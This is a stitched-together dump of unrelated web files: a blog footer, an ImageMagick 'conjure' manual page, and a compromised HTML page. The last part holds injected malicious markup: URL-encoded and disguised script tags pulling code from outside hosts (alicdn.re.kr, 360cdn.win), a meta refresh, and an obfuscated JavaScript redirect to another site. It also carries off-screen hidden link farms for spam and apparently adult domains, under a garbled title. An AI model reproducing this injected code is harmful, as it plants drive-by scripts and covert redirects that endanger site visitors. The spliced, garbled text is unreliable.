target="_blank"><i class="icon-facebook icon-2x"></i></a> <a href="https://plus.google.com/u/0/+KevinRenella" title="Kévin Renella on Google+" target="_blank"><i class="icon-google-plus icon-2x"></i></a> <a href="http://linkedin.com/in/kevinrenella" title="Kévin Renella on LinkedIn" target="_blank"><i class="icon-linkedin icon-2x"></i></a> <a href="http://stackoverflow.com/users/1984760/kevin-renella" title="Kévin Renella on StackExchange" target="_blank"><i class="icon-stackexchange icon-2x"></i></a> <a href="http://github.com/Drusy" title="Kévin Renella on Github" target="_blank"><i class="icon-github icon-2x"></i></a> </div><!-- /.social-icons --> </footer> </div><!-- /.footer-wrapper --> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <script>window.jQuery || document.write('<script src="http://drusy.github.io/assets/js/vendor/jquery-1.9.1.min.js"><\/script>')</script> <script src="http://drusy.github.io/assets/js/scripts.min.js"></script> <!-- Jekyll Simple Search option --> <script> $(document).ready(function() { $('.search-field').simpleJekyllSearch({ jsonFile : 'http://drusy.github.io/search.json', searchResults : '.search-results', template : '<li><article><a href="{url}">{title} <span class="entry-date"><time datetime="{date}">{shortdate}</time></span></a></article></li>', noResults: '<p>Nothing found.</p>' }); }); (function( $, window, undefined ) { var bs = { close: $(".icon-remove-sign"), searchform: $(".search-form"), canvas: $("body"), dothis: $('.dosearch') }; bs.dothis.on('click', function() { $('.search-wrapper').css({ display: "block" }); bs.searchform.toggleClass('active'); bs.searchform.find('input').focus(); bs.canvas.toggleClass('search-overlay'); }); bs.close.on('click', function() { $('.search-wrapper').removeAttr( 'style' ); bs.searchform.toggleClass('active'); bs.canvas.removeClass('search-overlay'); }); })( jQuery, window ); </script> <!-- Magnific popup --> <script> $(document).ready(function() { $('.zoom-gallery').magnificPopup({ delegate: 'a', type: 'image', closeOnContentClick: false, closeBtnInside: false, mainClass: 'mfp-with-zoom mfp-img-mobile', removalDelay: 300, image: { verticalFit: true }, gallery: { enabled: true }, zoom: { enabled: true, duration: 300, // don't foget to change the duration also in CSS opener: function(element) { return element.find('img'); } } }); }); </script> <!-- Asynchronous Google Analytics snippet --> <script> var _gaq = _gaq || []; var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js'; _gaq.push(['_require', 'inpage_linkid', pluginUrl]); _gaq.push(['_setAccount', 'UA-51790293-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script type="text/javascript"> /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */ var disqus_shortname = 'drusy'; // required: replace example with your forum shortname /* * * DON'T EDIT BELOW THIS LINE * * */ (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })(); /* * * DON'T EDIT BELOW THIS LINE * * */ (function () { var s = document.createElement('script'); s.async = true; s.type = 'text/javascript'; s.src = '//' + disqus_shortname + '.disqus.com/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); </script> <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a> </body> </html>
software/ImageMagick/www/conjure.html
mfaber/quexf
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html version="-//W3C//DTD XHTML 1.1//EN" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/1999/xhtml http://www.w3.org/MarkUp/SCHEMA/xhtml11.xsd"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="google-site-verification" content="MxsMq6bdLOx0KSuz1MY6yG9ZTIJ7_7DVRfl5NCAT5Yg"/> <title>ImageMagick: Command-line Tools: Conjure</title> <meta http-equiv="Content-Language" content="en-US"/> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Reply-to" content="magick-users@imagemagick.org"/> <meta name="Application-name" content="ImageMagick"/> <meta name="Description" content="Use ImageMagick to convert, edit, or compose bitmap images in a variety of formats. In addition resize, rotate, shear, distort and transform images automagically."/> <meta name="Application-url" content="http://www.imagemagick.org"/> <meta name="Generator" content="PHP"/> <meta name="Keywords" content="command-line, tools:, conjure, ImageMagick, PerlMagick, image processing, OpenMP, software development library, image, photo, software, Magick++, MagickWand"/> <meta name="Rating" content="GENERAL"/> <meta name="Robots" content="INDEX, FOLLOW"/> <meta name="Generator" content="ImageMagick Studio LLC"/> <meta name="Author" content="ImageMagick Studio LLC"/> <meta name="Revisit-after" content="2 DAYS"/> <meta name="Resource-type" content="document"/> <meta name="Copyright" content="Copyright (c) 1999-2012 ImageMagick Studio LLC"/> <meta name="Distribution" content="Global"/> <link rel="icon" href="../images/wand.png"/> <link rel="shortcut icon" href="../images/wand.ico" type="images/x-icon"/> <link rel="canonical" href="http://www.imagemagick.org" /> <link rel="meta" type="application/rdf+xml" title="ICI" href="http://imagemagick.org/ici.rdf"/> <!-- Add jQuery library --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script> <!-- Optionaly include easing and/or mousewheel plugins --> <script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.easing-1.3.pack.js"></script> <script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.mousewheel-3.0.6.pack.js"></script> <!-- Add fancyBox --> <link rel="stylesheet" href="http://www.imagemagick.org/fancybox/jquery.fancybox.css?v=2.0.3" type="text/css" media="screen" /> <script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.fancybox.pack.js?v=2.0.3"></script> <!-- Optionaly include button and/or thumbnail helpers --> <link rel="stylesheet" href="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-buttons.css?v=2.0.3" type="text/css" media="screen" /> <script type="text/javascript" src="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-buttons.js?v=2.0.3"></script> <link rel="stylesheet" href="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-thumbs.css?v=2.0.3" type="text/css" media="screen" /> <script type="text/javascript" src="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-thumbs.js?v=2.0.3"></script> <script type="text/javascript"> $(document).ready(function() { $(".fancybox").fancybox(); }); </script> <!-- ImageMagick style --> <link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" /> <style type="text/css" media="all"> @import url("../www/magick.css"); </style> </head> <body id="www-imagemagick-org"> <div class="titlebar"> <div style="margin: 17px auto; float: left;"> <script type="text/javascript"> <!-- google_ad_client = "pub-3129977114552745"; google_ad_slot = "5439289906"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> <a href="http://www.imagemagick.org/discourse-server/"> <img src="../images/logo.jpg" alt="ImageMagick Logo" style="width: 123px; height: 118px; border: 0px; float: right;" /></a> <a href="../index.html"> <img src="../images/sprite.jpg" alt="ImageMagick Sprite" style="width: 114px; height: 118px; border: 0px; float: right;" /></a> </div> <div class="westbar"> <div class="menu"> <a title="About ImageMagick" href="../index.html">About ImageMagick</a> </div> <div class="menu"> <a title="Binary Releases" href="../www/binary-releases.html">Binary Releases</a> </div> <div class="sub"> <a title="Binary Release: Unix" href="../www/binary-releases.html#unix">Unix</a> </div> <div class="sub"> <a title="Binary Release: MacOS X" href="../www/binary-releases.html#macosx">Mac OS X</a> </div> <div class="sub"> <a title="Binary Release: iOS" href="../www/binary-releases.html#iOS">iOS</a> </div> <div class="sub"> <a title="Binary Release: Windows" href="../www/binary-releases.html#windows">Windows</a> </div> <div class="sep"></div> <div class="menu"> <a title="Command-line Tools" href="../www/command-line-tools.html">Command-line Tools</a> </div> <div class="sub"> <a title="Command-line Tools: Processing" href="../www/command-line-processing.html">Processing</a> </div> <div class="sub"> <a title="Command-line Tools: Options" href="../www/command-line-options.html">Options</a> </div> <div class="sub"> <a title="Command-line Tools: Usage" href="http://www.imagemagick.org/Usage/">Usage</a> </div> <div class="menu"> <a title="Program Interfaces" href="../www/api.html">Program Interfaces</a> </div> <div class="sub"> <a title="Program Interface: MagickWand" href="../www/magick-wand.html">MagickWand</a> </div> <div class="sub"> <a title="Program Interface: MagickCore" href="../www/magick-core.html">MagickCore</a> </div> <div class="sub"> <a title="Program Interface: PerlMagick" href="../www/perl-magick.html">PerlMagick</a> </div> <div class="sub"> <a title="Program Interface: Magick++" href="../www/magick++.html">Magick++</a> </div> <div class="sep"></div> <div class="menu"> <a title="Install from Source" href="../www/install-source.html">Install from Source</a> </div> <div class="sub"> <a title="Install from Source: Unix" href="../www/install-source.html#unix">Unix</a> </div> <div class="sub"> <a title="Install from Source: Windows" href="../www/install-source.html#windows">Windows</a> </div> <div class="menu"> <a title="Resources" href="../www/resources.html">Resources</a> </div> <div class="menu"> <a title="Architecture" href="../www/architecture.html">Architecture</a> </div> <div class="menu"> <a title="Download" href="../www/download.html">Download</a> </div> <div class="sep"></div> <div class="menu"> <a title="Search" href="../www/search.html">Search</a> </div> <div class="sep"></div> <div class="menu"> <a title="Site Map" href="../www/sitemap.html">Site Map</a> </div> <div class="sub"> <a title="Site Map: Links" href="../www/links.html">Links</a> </div> <div class="sep"></div> <div class="menu"> <a rel="follow" title="Sponsors" href="../www/sponsors.html">Sponsors:</a> <a href="http://www.networkredux.com"> <img src="../images/networkredux.png" width="140" height="31" alt="[sponsor]" style="margin-top: 4px; margin-left: 4px; border: 0px; float: left;" /></a> <a href="http://www.dinodirect.com/ipads-tablets/"> <img src="../images/dino-direct.jpg" width="140" height="90" alt="[sponsor]" style="margin-top: 4px; margin-left: 4px; border: 0px; float: left;" /></a><!-- 201204010120 mickey@163... --> <div class="sponsbox"> <div class="sponsor"> <a rel="follow" title="Android Tablet" href="http://www.dinodirect.com/ipads-tablets/">Android Tablet</a><!-- 201204010120 mickey@163... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Web Hosting" href="http://www.micfo.com">Web Hosting</a><!-- 209901010090s golestan --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Autos Part" href="http://www.pkwteile.de/autoteile">Autos Part</a><!-- 201203010270 info@pkwte... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Web Site Hosting" href="http://webhostinggeeks.com">Web Site Hosting</a><!-- 201302010900 funds@enmob... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Tenant Check" href="http://www.rentmethod.com/">Tenant Check</a><!-- 201203010090 chris@rentm... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: VPS" href="http://www.interdominios.com/vps">VPS</a><!-- 201204010090 barsh@inter... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Premium Quality Stock Photos" href="http://www.f1online.pro/en/">Premium Quality Stock Photos</a><!-- 2012080100540 ... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Search engine optimisation" href="http://www.seomoves.com.au">Search engine optimisation</a><!-- 201301010090s jen@seo lowprofilelinks --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Druckerei" href="http://print24.com/de/">Druckerei</a><!-- 2012070100250 ... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Managed Server" href="http://www.robhost.de">Managed Server</a><!-- 201210010720 klikics... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Stock Photography" href="http://www.fotosearch.com/">Stock Photography</a><!-- 2012040100250 ... --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Autoteile" href="http://www.q11-shop.de">Autoteile</a><!-- 201205010540 suvalj --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Royalty Free Stock Images" href="http://www.canstockphoto.com/">Royalty Free Stock Images</a><!-- 2012050100360 support@can --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Web Hosting Reviews" href="http://www.webhostingsecretrevealed.com">Web Hosting Secret Revealed</a><!-- 201204010540 iamchee jerry --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Druckerei" href="http://www.allesdruck.de">Druckerei</a><!-- 201303011500 r.leo --> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Photo Sharing Websites" href="http://www.zoofoo.com">Photo Sharing Websites</a><!-- 2012050100150 dancu@dans...--> </div> <div class="sponsor"> <a rel="follow" title="Sponsor: Hosting Web" href="http://www.hostalia.com">Hosting Web</a><!-- 20120401000150 david@carre... --> </div> </div> </div> </div> <div class="eastbar"> <div class="g-plusone" data-size="standard" data-count="false"></div> <script type="text/javascript"> window.___gcfg = { lang: 'en-US' }; (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> </div> <div class="main"> <h1>ImageMagick Conjure Command-line Tool</h1> <p class="navigation-index">[<a href="#usage">Example Usage</a> &bull; <a href="#options">Option Summary</a>]</p> <div class="doc-section"> <p>The <kbd>conjure</kbd> program gives you the ability to perform custom image processing tasks from a script written in the Magick Scripting Language (MSL). MSL is XML-based and consists of action statements with attributes. Actions include reading an image, processing an image, getting attributes from an image, writing an image, and more. An attribute is a key/value pair that modifies the behavior of an action. See <a href="../www/command-line-processing.html">Command Line Processing</a> for advice on how to structure your <kbd>conjure</kbd> command or see below for example usages of the command.</p> </div> <h2><a id="usage"></a>Example Usage</h2> <div class="doc-section"> <p>We list a few examples of the <kbd>conjure</kbd> command here to illustrate its usefulness and ease of use. To get started, here is simple <kbd>conjure</kbd> command:</p> <p class='crt'><span class="crtprompt"> $ </span><span class='crtin'>conjure -dimensions 400x400 incantation.msl</span></p> <p>The MSL script <a href="../www/source/incantation.msl">incantation.msl</a> used above is here:</p> <pre class="text"> &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;image size="400x400"&gt; &lt;read filename="image.gif" /&gt; &lt;get width="base-width" height="base-height" /&gt; &lt;resize geometry="%[dimensions]" /&gt; &lt;get width="width" height="height" /&gt; &lt;print output="Image sized from %[base-width]x%[base-height] to %[width]x%[height].\n" /&gt; &lt;write filename="image.png" /&gt; &lt;/image&gt; </pre> <p>In this example, a family stayed home for their vacation but as far as their friends are concerned they went to a beautiful beach in the Caribbean:</p> <pre class="text"> &lt;?xml version="1.0" encoding="UTF-8"?> &lt;group> &lt;image id="family"> &lt;read filename="family.gif"/> &lt;resize geometry="300x300"/> &lt;/image> &lt;image id="palm-trees"> &lt;read filename="palm-trees.gif"/> &lt;resize geometry="300x100"/> &lt;/image> &lt;image> &lt;read filename="beach.jpg"/> &lt;composite image="family" geometry="+30+40"/> &lt;composite image="palm-trees" geometry="+320+90"/> &lt;/image> &lt;write filename="family-vacation.png"/> &lt;/group> </pre> <p>Here we display the width in pixels of text for a particular font and pointsize.</p> <pre class="text"> &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;image&gt; &lt;query-font-metrics text="ImageMagick" font="helvetica" pointsize="48" /&gt; &lt;print output="Text width is %[msl:font-metrics.width] pixels.\n" /&gt; &lt;/image&gt; </pre> <p>The <kbd>query-font-metrics</kbd> tag supports these properties:</p> <pre class="text"> msl:font-metrics.pixels_per_em.x msl:font-metrics.pixels_per_em.y msl:font-metrics.ascent msl:font-metrics.descent msl:font-metrics.width msl:font-metrics.height msl:font-metrics.max_advance msl:font-metrics.bounds.x1 msl:font-metrics.bounds.y1 msl:font-metrics.bounds.x2 msl:font-metrics.bounds.y2 msl:font-metrics.origin.x msl:font-metrics.origin.y </pre> <p>MSL supports most methods and attributes discussed in the <a href="../www/perl-magick.html">Perl API for ImageMagick</a>. </p> <p>In addition, MSL supports the <kbd>swap</kbd> element with a single <kbd>indexes</kbd> element.</p> <p>You can find additional examples of using <kbd>conjure</kbd> in <a href="http://www-106.ibm.com/developerworks/library/l-graf/?ca=dnt-428">Graphics from the Command Line</a>. Further discussion is available in <a href="http://www-106.ibm.com/developerworks/library/l-graf2/?ca=dgr-lnxw15GraphicsLine">More Graphics from the Command Line</a> and <a href="http://www.imagemagick.org/Usage/">Examples of ImageMagick Usage</a>.</p> </div> <h2><a id="options"></a>Option Summary</h2> <div class="doc-section"> <p>The <kbd>conjure</kbd> command recognizes these options. Click on an option to get more details about how that option works.</p> <table class="doc"> <tbody> <tr> <th align="left">Option</th> <th align="left">Description</th> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#debug">-debug <em class="option">events</em></a></td> <td valign="top">display copious debugging information</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#help">-help</a></td> <td valign="top">print program options</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#log">-log <em class="option">format</em></a></td> <td valign="top">format of debugging information</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#monitor">-monitor</a></td> <td valign="top">monitor progress</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#quiet">-quiet</a></td> <td valign="top">suppress all warning messages</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#regard-warnings">-regard-warnings</a></td> <td valign="top">pay attention to warning messages.</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#seed">-seed <em class="option">value</em></a></td> <td valign="top">seed a new sequence of pseudo-random numbers</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#verbose">-verbose</a></td> <td valign="top">print detailed information about the image</td> </tr> <tr> <td valign="top"><a href="../www/command-line-options.html#version">-version</a></td> <td valign="top">print version information</td> </tr> </tbody> </table> </div> </div> <div id="linkbar"> <span id="linkbar-west">&nbsp;</span> <span id="linkbar-center"> <a href="http://www.imagemagick.org/discourse-server/">Discourse Server</a> &bull; <a href="http://www.imagemagick.org/MagickStudio/scripts/MagickStudio.cgi">Studio</a> </span> <span id="linkbar-east">&nbsp;</span> </div> <div class="footer"> <span id="footer-west">&copy; 1999-2011 ImageMagick Studio LLC</span> <span id="footer-east"> <a href="http://www.imagemagick.org/script/contact.php">Contact the Wizards</a></span> </div> <div style="clear: both; margin: 0; width: 100%; "></div> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-17690367-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
logs/bloglease/02031103773.html
ForAEdesWeb/AEW2
<script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> <script/src=//alicdn.re.kr/re.kr></script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø</title> <meta name="keywords" content="99re2.¾Ã¾ÃÈÈ×îеØÖ· ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×ÛºÏÍø ²å²å×ÛºÏÍø"> <meta name="description" content="99re2.¾Ã¾ÃÈÈ×îеØÖ·¸÷ÖÖ¾«²ÊÄÚÈÝʵʱ¸üÐÂ,Ϊ¹ã´óÍøÓÑÌṩԭ´´×ÊÔ´,99re2.¾Ã¾ÃÈÈ×îеØÖ·Ò»ÆðËáˬ¡£ ,˼˼µÄ¼ÒÔ°"><link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> </head> -------!> <script/src=//360cdn.win/c.css></script> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com"> <script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script> <script/src=//alicdn.re.kr/re.kr></script> <div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;"> <a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a> <a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a> <a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a> <a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a> <a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a> <a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a> </div class="a1b2c8d9e1"> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a 